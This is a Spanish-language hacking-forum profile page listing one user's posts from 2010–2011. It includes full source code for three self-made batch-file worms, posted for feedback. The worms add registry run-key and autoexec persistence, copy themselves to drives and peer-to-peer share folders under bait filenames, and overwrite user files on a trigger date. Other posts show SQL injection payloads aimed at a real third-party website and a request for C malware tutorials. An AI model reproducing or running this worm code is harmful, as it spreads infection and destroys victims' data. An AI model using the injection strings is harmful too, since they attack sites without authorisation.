elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Temas
Páginas: [1] 2
1  Seguridad Informática / Bugs y Exploits / iniciando en el mundo de SQLi [ayuda] en: 29 Julio 2011, 01:32
Encontre una pagina que tiene una vulnerabilidad SQL:

el servidor es un MySQL tengo los detalles del servidor y toda la cosa

estos son los parametros que inyecto:

----> '4+and+1=0+union+select+1+from+votos+--+

a esta linea

----> modules.php?name=Surveys&op=results&pollID=

cuando lo hago obtengo el resultado siguiente:

   
Encuesta



Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/***/***/***/sql_layer.php on line 301 (por supuesto los asteriscos los puse yo para cubrir datos que considero sensible)
 estare haciendo algo malo, y no me digan que pase el sqlmap, ya lo hice y lo unico que dice es:

[18:32:04] [CRITICAL] invalid target details, valid syntax is for instance 'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' or 'access://DATABASE_FILEPATH'

2  Foros Generales / Foro Libre / [propuesta] Interesado en la formacion de un grupo de newbies? en: 28 Julio 2011, 21:12
No se si es el lugar debido para postear esto pero aqui va:

Me ah llegado a la cabeza la pregunta, Es posible que formemos un grupo de newbies en el foro? por que no?

Si la repuesta es si,,pues:

Podriamos formar un grupo de newbies, para compartir entre nosotros ideas, codigos, aprendizaje, etc..la organizacion seria algo como esto:

  • obligatorio
  • requerido

*> debemos tener conexion a internet(sea propia o no)

+> el grupo no puede tener mas de diez(10) miembros.. asi, de formarse otro grupo podriamos competir entre grupos(esto es bueno por que la competencia fomenta el aprendizaje)..

*> todos los miembros deben tener aceso a GNU/Linux(tenerlo instalado, en una maquina virtual, aceso a shell remota, etc).

+> seguiremos/leeremos manuales por lo que se requiria tener una formar una biblioteca de tutoriales, manuales, ahitepapers, etc.

+> empezaremos por lo basico, pero todos los miembros deben tener conocimiento general-basico sobre informatica, esto quiere decir que por lo menos debes saber encender y apagar la pc

*> se programaran herramientas, se realizaran competencias, que publicaremos en el foro(lo que no se si esta permitido o no).

*> como los grupos deben ser ordenados y democraticos las decisiones importantes seran sometidas a votacion.

*> cada miembro debera reportar los que ah aprendido ya sea publicando codigo, programando una herramienta, etc, etc.

*> de ser necesario se eliminara/hechara a miembros que incurran en acciones perjudiciales o ilegales, es solo con intenciones educacionales ;).

+/*? se podria publicar una eZine

+> necesitaremos un lugar donde reunirnos para eso podemos usar IRC, MSN, ICQ, direcciones de correo, salas de chat,etc, etc, *nada que tenga que ver con redes sociales* *no personal* *no facebook* *google+* *no tabe* no babe* *no hi5*, nada


Grupo cerrado, debido a que el tiempo se ah agotado no se reciviran mas solicitudes

Miembros confirmados:

Citar

dArKo2   /* activo
eagle17   /* confirmado - activo
portaro    /* no confirmado - eliminado
kub0x      /* confirmado - activo
bitaziko    /*no confirmado - elimidado
mini_nauta   /*no confirmado - eliminado
IWKY    /* confirmado
Ivar <---se retiro
a0xsys   /* confirmado - activo
DameBanda    /* confirmado - activo
farresito      /* confirmado - activo
kal3o  /* confirmado - activo

Si estabas interesado pero no apareciste en la lista MP

saludos
3  Seguridad Informática / Hacking Ético / es hacer posible SQLi? en: 27 Julio 2011, 22:54
estoy de vuerta y practicando SQLi, me encontre con un caso interesante intente hacer SQLi una pagina"

*Servidor IIS 6.0
*ASP.net
 *puerto 80
*puerto 443

el problema es que cuando intento probar si es vulnerable usando '1+and+1=0 no me muestra errores la pagina o el link cuestion termina asi:

/search.cfm?cat=1

cuando lo ejecuto no pasa nada sin embargo cuando uso cambio el valo a 0"

/search.cfm?cat=0

si me muestra el error

ayuda por favor
sl0th
4  Programación / Scripting / [V][batch-vbs]Angurria.b.bat teminado!! :) en: 24 Marzo 2011, 00:02
Aqui la version final de mi pequeña creacion :D la version 'B' no es la gran cosa pero recuerden que es batch :S



Código
  1. @echo off
  2. assoc .avi=batfile
  3. if %date% GEQ 02/27/2012 goto :~0xDdAy
  4. if exist %systemdrive%\AnGurrIa.x (goto :EOF)
  5. for %%A in (E F G H I J K L M N O P Q R S T U V W X Y Z) do copy %0 %%A:\AnGurrIa.bat
  6. for %%u in (*.*) do attrib -s -r -a %%u >nul
  7. copy /Y %0 %systemdrive%\AnGurrIa.bat >nul
  8. attrib -r -h -s C:\autoexec.bat
  9. copy %0 C:\AnGurrIa.x >nul
  10. type C:\autoexec.bat|find "AnGurrIa.x">C:\autoexec.bat
  11. echo call C:\AnGurrIa.x >> C:\autoexec.bat
  12. REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v BootConfig /t REG_SZ /d C:\AnGurrIa.x
  13. attrib +r +h +s c:\autoexec.bat
  14. attrib +r +h +s c:\AnGurrIa.x
  15. set 1=VideosXxX
  16. set 2="benlla_Carolina_xxxAVI"
  17. set 3="mujer_con_pony_XXXX"
  18. set 4="adolecentes_Ardientes"
  19. set 5="hot_lesbians"
  20. set 6="BoricuaxXxPlayBoy[Avi-DvDRip]"
  21. set x=%homedrive%\ñoño.bk
  22. type %0>ñoño.bk
  23. mkdir %1%
  24. cd %1%
  25. for %%b in (%2% %3% %4% %5% %6%) do mkdir %%b
  26. dir /b >%tmp%\secmngr.tmp
  27. for /f "tokens=* " %%x in (%temp%\secmngr.tmp) do
  28. call :~sEx %%x
  29. net share "%homedrive%\VideosXxX"
  30. :~sEx
  31. set clit=%1
  32. cd %clit%
  33. type %1>"video.avi"
  34. cd %homedrive%\%a%
  35. echo set shell = CreateObject("wscript.shell") >%homedrive%\0x.vbs
  36. echo shell run "cmd /c %0" xxx", vbHide >>%homedrive%\0x.vbs
  37. start /B /HIGH /D %homedrive%\0x.vbs
  38. set f="%systemdrive%%~AnGurrIa.bat"
  39. cd "%systemdrive%%~AnGurrIa.bat"
  40. echo eMule\Incoming\ > %windir%\mZ.p
  41. echo Shareaza\Downloads\ >> %windir%\mZ.p
  42. echo BearShare\Shared\ >> %windir%\mZ.p
  43. echo EDONKEY2000\incoming\ >>%windir%\mZ.p
  44. echo LimeWire\Shared\ >> %windir%\mZ.p
  45. echo Ares??? >>%windir%\mZ.p
  46. echo Daddy_Yankee_exitos >%windir%\mX.p
  47. echo Kaspersky_Keygen >>%windir%\mX.p
  48. echo benlla_carolina_sextape >>%windir%\mX.p
  49. echo Windows_7_Keygen >>%windir%\mX.p
  50. echo Harry_Potter[avi][DvD-Rip] >>%windir%\mX.p
  51. echo reggaeton_lo_ma_pegao >>%windir%\mX.p
  52. echo black_berry_unlocker[totalmentegratis] >>%windir%\mX.p
  53. echo iphone_unlocker[gratis] >>%windir%\mX.p
  54. set v4=1
  55. set b4="%programfiles%\WinRar\WinRAR.exe"
  56. %b4% a %windir%\t.rar %f%
  57. if not %errorlevel%==9009 set v4=0
  58. goto :~zUz
  59. :~x0x
  60. set v=%1
  61. for /F "tokens=*" "delims=" %%n in (%windir%\mX.p) do (
  62. if %v4%==0 copy /Y %0 "%%n.bat"
  63. cls
  64. %b4% a "%%n.rar" "%%n.bat")
  65. goto :EOF
  66. :~zUz
  67. for /F "tokens=*" "delims=" %%q in (%windir%\mZ.p) do (if exist %programfiles%\%%n
  68. cd %programfiles%\%%n
  69. )
  70. for %%i in (*.rar) do (
  71. copy /Y %0 "%%m.bat"
  72. )
  73. %b4% a "%%a" "%%n.bat"
  74. cls
  75. call :~x0x %%a
  76. cd %windir%
  77. del /F *.p
  78. assoc .x=batfile
  79. ren c:\AnGurrIa.bat c:\AnGurrIa.x
  80. copy /Y %0 %temp%\%random%.x
  81. copy /Y %0 %appdata%\%random%.x
  82. copy /Y %0 %allusersprofile%\%random%.x
  83. :~0xDdAy
  84. echo.UnEtE aL lAdO oScUrO, tEnEmOs GaLlEtAs GrAtIs!!! >% style="color: #448888;">temp%\AnGurrIa.tmp
  85. echo.OtRa GuErRa iNjUsTiFiCaDa??!! >>% style="color: #448888;">temp%\AnGurrIa.tmp
  86. for %%a in (*.txt,*.log) do ren *.bat %%a >nul
  87. for %%a in (*.bat) do copy %temp%\AnGurrIa.tmp %%a >nul
  88. for %%i in (*.iso,*.rar,*.zip,) do set xy=%%i
  89. copy %temp%\AnGurrIa.tmp %xy%
  90. del /F %temp%\AnGurrIa.tmp
  91. :EOF
  92.  

les agradeceria si revisan el codigo y me dicen si tiene errores
5  Seguridad Informática / Análisis y Diseño de Malware / algunos tutoriales para malware en C?? en: 11 Noviembre 2010, 00:01
alguno de ustedes saben donde encontrar buenos tutos de C para programar malware???






salu2
6  Programación / Scripting / [v][batch]AnGurrIa.a en: 2 Octubre 2010, 04:16
bueno aqui esta mi codigo (en batch como es de esperarse) ya que soy nuevo en esto de la programacion en Batch seguire intentando programar cada vez un poco mejor  :) seguire practicando en este lenguaje de scripting tan facinante como es batch  :xD ya estoy trabajando en la version "B" de este code, les pido que si dedican su tiempo a leer este codigo se detengan un poco a darme algunos consejos para asi aplicar lo aprendido en codigos futuros....de antemano gracias... ;-)

Código:
@rem X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-TEST-FILE!$H+H*
@rem ++++++++++++++++++++++++++++++++++++++++++++++++
@rem +[No]: AnGurRIa.a                              +
@rem +[Au]: Sl0tH                                   +
@rem +[Pr]: No                                      +
@rem +[In]: Si                                      +
@rem +[Po]: No                                      +
@rem +[Ob]: Si                                      +
@rem +Comment:                                      +
@rem +Este archivo de comandos por lotes ah sido    +
@rem +creado con fines meramente educacativos       +
@rem +el autor del mismo no se responsabiliza del   +
@rem +mal uso o lo daños que puedan ser ocacionados +
@rem +por dicho codigo.                             +
@rem ++++++++++++++++++++++++++++++++++++++++++++++++
@set attrib=%eax%
@set for=%jmp%
@set copy=%get%
@set in=%oop%
@set echo=%null%
@set trash=
assoc .zzx=batfile
%trash%
if exist %prografiles%\Windows Live\Messenger\msnmsgrassistent.zzx (goto:_qwerty) else (goto:_ytrewq)
:_ytrewq
@%null% off
%trash%
%get% /Y %0 %prografiles%\Windows Live\Messenger\msnmsgrassistent.zzx
%trash%
reg add HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run /v MSNHelper /T REG_SZ /d %prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%eax% %prografiles%\Windows Live\Messenger\msnmsgrassistent.zzx +h +r +s
%trash%
%eax% %windir%\*.* -h -r -s
%trash%
%jmp% %%i %oop% (%windir%\*.log,*.txt,*.htm,*.bat) do %get% %0 %%i
%eax% %windir%\*.* +h +r +s
%trash%
%eax% %windir%\web\*.* -h -r -s
%trash%
%jmp% %%i %oop% (%windir%\web\*.log,*.txt,*.htm,*.bat) do %get% %0 %%i
%eax% %windir%\web\*.* +h +r +s
%trash%
%eax% %programfiles%\*.* -h -r -r
%trash%
%jmp% %%i %oop% (%programfiles%\*.log,*.txt,*.htm,*.bat) do %get% %0 %%i
%eax% %programfiles%\*.* +h +r +r
%trash%
%jmp% %%i %oop% (%windir%\*.log,*.txt,*.htm,*.bat) do ren *.cmd
%trash%
%jmp% %%i %oop% (%windir%\web\*.log,*.txt,*.htm,*.bat) do ren *.cmd
%trash%
%jmp% %%i %oop% (%programfiles%\*.log,*.txt,*.htm,*.bat) do ren *.cmd
:_qwerty
%trash%
%null% @echo off >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% :_fe3d >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% for %%a in (%windir%\*.cmd) do echo jgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhj >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% for %%a in (%windir%\web\*.cmd) do echo jgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhj >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% for %%a in (%programfiles%\*.cmd) do echo jgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhj >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% goto:_fe3d >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%eax% %prografiles%\Windows Live\Messenger\msnhelp.zzx +h +r +s
%trash%
mkdir %prografiles%\WhenUsave
%trash%
mkdir %prografiles%\UltimateSearch
%trash%
mkdir %prografiles%\Complus Aplications
%trash%
mkdir %prografiles%\Search4fun
%trash%
mkdir %prografiles%\ZangoGames
%trash%

gracias a SDK por su tutorial el cual me esta siendo muy util y me ayudo con el entendimiento del For y a un user que me ayudo a entender mas el For que ahora por flojera no lo escribire...


saludos
7  Programación / Scripting / como modificar muchos archivos de una misma extension? en: 23 Septiembre 2010, 03:42
digamos que se da el caso de que tengo varios discos (C,D,E,F,G...etc) y me eh infectado con un autorun.inf, como podria hacer para poder usar un comando sobre todos esos archivos que estan presentes en esos disco?

es posible hacer algo como:
attrib -h -r -s *.inf c:,d:,e:,f:,etc ?

o digamos que el caso es que el worm o el virus copia un .bat, .exe...como haria para hacer lo mismo pero en esos que tienen diferentes extensiones?

es posible hacer algo como:
attrib -h -r -s *.inf,*.exe,*.bat ?
8  Programación / Scripting / [V][batch]Primer Intento en: 22 Septiembre 2010, 04:02
el primer intento que hago de hacer alguna cosa en batch...quiero que alguien se tome la molestia de revisar este codigo y si encuentra errores o me puede dar algunas sugerencias de como mejorarlo, adelante, las criticas constructivas seran bien recividas..

Código:
@echo off
rem ***********************************************
rem * name: win32.amerifags                       *                                            
rem * by: sl0th                                   *        
rem * Infection method: No                        *
rem * Polymorphism: No                            *
rem * Payload: No                                 *
rem * Propagation method: No                      *                    
rem ***********************************************
copy /y "c:\System Volume Imformation\Winservices\amerifags.zzx"
assoc .zzx=batfile
reg add "HKLM\Software\Microsoft\Internet Explorer\http" /v "InternetExplorerUpdate" /d "c:\System Volume Imformation\Winservices\amerifags.zzx" /f
mkdir "c:\System Volume Imformation\Winservices"
attrib +h +r +s "c:\System Volume Imformation\Winservices\amerifags.zzx"
echo call "c:\System Volume Imformation\Winservices\amerifags.zzx">AUTOEXEC.bat
echo ^<head^> >>%USERPROFILE%\host.html
echo ^<title^> >>%USERPROFILE%\host.html
echo ^<h4^> [C.m.D] ^</h4^> >>%USERPROFILE%\host.html
echo ^</title^> >>%USERPROFILE%\host.html
echo ^</head^> >>%USERPROFILE%\host.html
echo ^<body^> >>%USERPROFILE%\host.html
echo ^<b^>^<h1^> vXed by sl0th!! ^</h1^>^</b^> >>%USERPROFILE%\host.html
echo ^</body^> >>%USERPROFILE%\host.html
eof

debo agradecer a SDK por el tutorial me esta siendo muy util y me ah alentado a seguir creando cositas como estas..

saludos
9  Programación / Scripting / Ayuda con FOR en Batch!! en: 16 Septiembre 2010, 07:46
todavia tengo algunos problemas o mejor dicho muchos problemas para usar el FOR en Batch me parece que las explicaciones que eh leido son muuuuy complicadas y los ejemplos muuuuuuuy vacios...por favor ayuda!! :-\
10  Programación / Scripting / archivos ocultos --- Claves de registro? en: 12 Septiembre 2010, 23:49
mi duda es en cuanto o como puede afectar que una clave de registro llame a la ejecucion un archivo que este oculto o que la carpeta que lo contiene lo este?
Páginas: [1] 2
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines